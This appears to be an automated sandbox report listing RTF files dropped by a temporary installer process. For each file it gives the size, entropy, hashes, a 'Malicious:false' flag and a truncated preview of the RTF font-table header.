                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimino
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36818
                                                                                                                                                                                                                                                          Entropy (8bit):5.041090274116406
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BbKxdCpT2njX8x3fDVyOvjU0EGi2YuWZ/6A9m:Bs2TyIA9m
                                                                                                                                                                                                                                                          MD5:FF313FAF3C594763F16D083E7036D86A
                                                                                                                                                                                                                                                          SHA1:E0C366F97CBF210063B17FA453D0A2EAA879953A
                                                                                                                                                                                                                                                          SHA-256:FA691CAE1E17899C0EFA053BE2EFDF95D9E4F13C10F02A7683FA5C88E66F52EA
                                                                                                                                                                                                                                                          SHA-512:2D64CF19B391D3900226225EE74DB20DD5542A1F2A8635A92CB83C0B948A815B5FC28ADF979713417EE97EAE0CB02CCD1E2FF1EA5648A9C250DE60221177FEA5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimino
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36262
                                                                                                                                                                                                                                                          Entropy (8bit):5.030821265978035
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4OkUx1ETicPI0QhhiLV/gKsmWgFdMXZ/6A9z:q44VUnSIA9z
                                                                                                                                                                                                                                                          MD5:61D796543650EBE8C4A143DCAFAE4D24
                                                                                                                                                                                                                                                          SHA1:54CD649E28D6442AA3946EE9891A156A68A3B2CB
                                                                                                                                                                                                                                                          SHA-256:585B560159CC4BDB9361F30B002CE9AA44AD510FB30A61257076810146B2D918
                                                                                                                                                                                                                                                          SHA-512:201BFB392E79FBC5A62A63610CD19B009ED98C54D5DF34B86C696C757175CD1DB3650B0CE0938C5C3529BD155C9E63E158D153588C723A1F968BDDBF05017A68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdb
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):68188
                                                                                                                                                                                                                                                          Entropy (8bit):5.031260319156822
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eox1edVW3C79k5haj5g5V5V5h5G5P5N5R5gVVhGPN8turfTYlDSsGx7TYlD+sE:q4N18T22yAwfv1vfvZ9I+kXrPtIA9D
                                                                                                                                                                                                                                                          MD5:FAC5492A79C913CDD25F21166FB2CBDC
                                                                                                                                                                                                                                                          SHA1:F989F1D0D67D3B121AD1B4A491FE81CC6D1C55D2
                                                                                                                                                                                                                                                          SHA-256:5C9D5955EB4E98A177EDA4E4B39BF09E19E3D6B83E634CA5C72CEFBDB8FE7178
                                                                                                                                                                                                                                                          SHA-512:A715FC343E1183806AA428EDF040B6964EEA8492751C6453293729874A77F43867246813625D4C0D62ACBD00DC0BDE267EBF1285B3A96C0C5D5B4C9F0BF5CF7D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46778
                                                                                                                                                                                                                                                          Entropy (8bit):5.04213022372363
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BbO4jB7F2njX8x3nF9k6Bvtk+k1pJKOQBX0hUH/EIvx9WahytOAnkWiwaTdnkmDk:B1hKIA9N
                                                                                                                                                                                                                                                          MD5:F60A5BBD42D01BA5BE2200C53152A370
                                                                                                                                                                                                                                                          SHA1:D5F8ED456623E3D8B44D6D87EDC705A0A27D0382
                                                                                                                                                                                                                                                          SHA-256:7E5BED54A681A9701FBD6B6C12A4A53594DECD4B60AE8087DB96DCAD23DDF72C
                                                                                                                                                                                                                                                          SHA-512:C66DA1A5D293F957A84B9B787B5487CD38A04DE39B4B955E1214954FE64FE14654265F942991A77816DB83BBED95818D1F5EE825B8C5AADD60B2A48EC1CEC841
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimino
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36818
                                                                                                                                                                                                                                                          Entropy (8bit):5.041090274116406
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BbKxdCpT2njX8x3fDVyOvjU0EGi2YuWZ/6A9m:Bs2TyIA9m
                                                                                                                                                                                                                                                          MD5:FF313FAF3C594763F16D083E7036D86A
                                                                                                                                                                                                                                                          SHA1:E0C366F97CBF210063B17FA453D0A2EAA879953A
                                                                                                                                                                                                                                                          SHA-256:FA691CAE1E17899C0EFA053BE2EFDF95D9E4F13C10F02A7683FA5C88E66F52EA
                                                                                                                                                                                                                                                          SHA-512:2D64CF19B391D3900226225EE74DB20DD5542A1F2A8635A92CB83C0B948A815B5FC28ADF979713417EE97EAE0CB02CCD1E2FF1EA5648A9C250DE60221177FEA5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimino
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42483
                                                                                                                                                                                                                                                          Entropy (8bit):5.0516758116152145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwqtxdo1SeUGLicPI0QhhiLVptabQhOsWx2DqxxqAJ7iYH2qlyTU6Z/6A9r:BvrUneKDZIA9r
                                                                                                                                                                                                                                                          MD5:4419419BD2ABBE30C63B730ADA875674
                                                                                                                                                                                                                                                          SHA1:2946FB19C980B330C1B4719AE6F915520709D99D
                                                                                                                                                                                                                                                          SHA-256:180D6187E16BE50A3649B861A5FB7580F0AE99E949FBE0EAC05FBB5B17BD6F99
                                                                                                                                                                                                                                                          SHA-512:2656094851AFBF719ECC12DE1AAA73C2040DA4FCCD7B4AB4E0FB6130472E606C5F8010A1D58C6D015F5DD8A71DB7C6E14811229FF2360F3D26BFAC4E737CE6A5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42867
                                                                                                                                                                                                                                                          Entropy (8bit):5.0494431999578
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BXKxdC6T2njX8x3TLjwUtqYepfwDyQbLjJAfop7ATX8zOpSyXZSpyEW7HuHlV1Z9:BYFfIA9p
                                                                                                                                                                                                                                                          MD5:2130BD1D1919D711A5AF21035C3503CC
                                                                                                                                                                                                                                                          SHA1:0F92AF4AD5D98942DD464C2D2DBFB2D23FC7BF1B
                                                                                                                                                                                                                                                          SHA-256:C62CAA4DFD7ADE415A27535B12C7B80992C1617106CEA4D271D8B159D97DC724
                                                                                                                                                                                                                                                          SHA-512:28EF2FF5A3AA227A1532E1283EB5D530F8BC45C401B346503A60CA026718D64A5CB020D198DC43B16FCD3FA751E36524D8BDDEB7E8FA9D3209B86211AB728612
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 020206
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42553
                                                                                                                                                                                                                                                          Entropy (8bit):5.039163820303254
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqOkDx1eVGh+DoLLXI1nhDGi3w2EHlT2njX8x3DldDMomI6u5DumZ/6A9X:qqb5nIA9X
                                                                                                                                                                                                                                                          MD5:34E55F7E9F1B2541BE0A17FB6871F9C9
                                                                                                                                                                                                                                                          SHA1:C9E188BCC39C88251CE9CBBA13E20F7BCA48F89F
                                                                                                                                                                                                                                                          SHA-256:B02273E5A9A45909D24B7349E45BE521B9421CB93CE1803BAE7B4FA317443376
                                                                                                                                                                                                                                                          SHA-512:D2C86622CD0726F5A480D11A3734C742D82853467CF3C1FB36F9ADE0873227862E26C366B8DD1E45B8D48F6AF62BA22FCD2C4C8FEEEEC6740B290F3E814ED65D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53700
                                                                                                                                                                                                                                                          Entropy (8bit):4.980792929518482
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqOkbe0ULHT2njX8x3TLjwUtqYepAkVZEdvI9DfLBmKPKPqP/tPw8Ecnv7eJTEcc:qq0EfLBGIA9Jk
                                                                                                                                                                                                                                                          MD5:4F112D455797B724837B7714D54B6621
                                                                                                                                                                                                                                                          SHA1:20351467C091733C0E7F4848B7809D54112143FE
                                                                                                                                                                                                                                                          SHA-256:6ED5F0BC906B1E1A884CCF648C4D81FAD8B0B6D8A13F07BC90796811E6C13035
                                                                                                                                                                                                                                                          SHA-512:928762682FE7FFCB119E93C8AB228EBF62D63763230A2C43F76D9504DC9DB4BF85E0519C2E4245B20FAC038DC83DBDA82FDDB606FD9C7F4552CAA86B61904121
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37003
                                                                                                                                                                                                                                                          Entropy (8bit):5.038330646707192
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BbKxdCjOcPI0QhhiLVZMB5WjuOBYB1xlmZ/6A9P:Bs5Un9IA9P
                                                                                                                                                                                                                                                          MD5:75DF6CB458A94E38B33006A5BB1AB3CA
                                                                                                                                                                                                                                                          SHA1:7EE17FB0A1760D5C89FC4B86CB98CF3EA71E333D
                                                                                                                                                                                                                                                          SHA-256:81275BC2F9DF017DD33438D44E3F4ACECDAC376281CD5C37F782538D937F8E3F
                                                                                                                                                                                                                                                          SHA-512:89CD75E4140B9C9F90DB760FA806039017AF4558FC74AE5327F547DD7E3DF14710925F1F7C55C648F7A947753B48703A1AC47F905C9EDF454599828F3CD4A86D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimino
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49864
                                                                                                                                                                                                                                                          Entropy (8bit):5.043460580292076
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bbi4jegzTJqNgVVhGPNXturfTYlDojU7FDSSmDP3QyYd9RhtAx/IFdNJf+v/AXQ0:BJkethIA9Q
                                                                                                                                                                                                                                                          MD5:C5AC9F8F23886CDA2348A3BC382F8F9B
                                                                                                                                                                                                                                                          SHA1:E18B97EA75873D424D0F0CDD349632CA3C96B656
                                                                                                                                                                                                                                                          SHA-256:EC49E0ED640B29CF852E455D9D0A7666914DC7114D771F514405944F6C8D3733
                                                                                                                                                                                                                                                          SHA-512:4A8FB239C01F8E1A163C6CB75C84884CADBAF0FA25159218D40F73F73A9255353134EA0D64800EAC40E49383085D5EFF05662B78FF43696A69A1FB591C80A7F1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimino
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41676
                                                                                                                                                                                                                                                          Entropy (8bit):5.05075856281513
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwqtxdo1SeUGLicPI0QhhiLVptabQhOsWx2rvx6qk0oDHvZlLMKFZ/6A9d:BvrUneKrsIA9d
                                                                                                                                                                                                                                                          MD5:CE47EF60A1B6296B4770FEE4454B1E06
                                                                                                                                                                                                                                                          SHA1:5B17759D122086E5E02A32BFB947A8746EF3076D
                                                                                                                                                                                                                                                          SHA-256:9BB74EA64A2AAEC3470E7EE10C1EE4CA70AC357CB6DDF9D6C810869B7A18BB25
                                                                                                                                                                                                                                                          SHA-512:2727839D56824EF21AB7F3340649483F576665EE1B561A2FD72ED31158B6FE2B854880558E991DF5F9B48125A8E85A1E3D88623C0282151285FBCA5470FFE7EA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
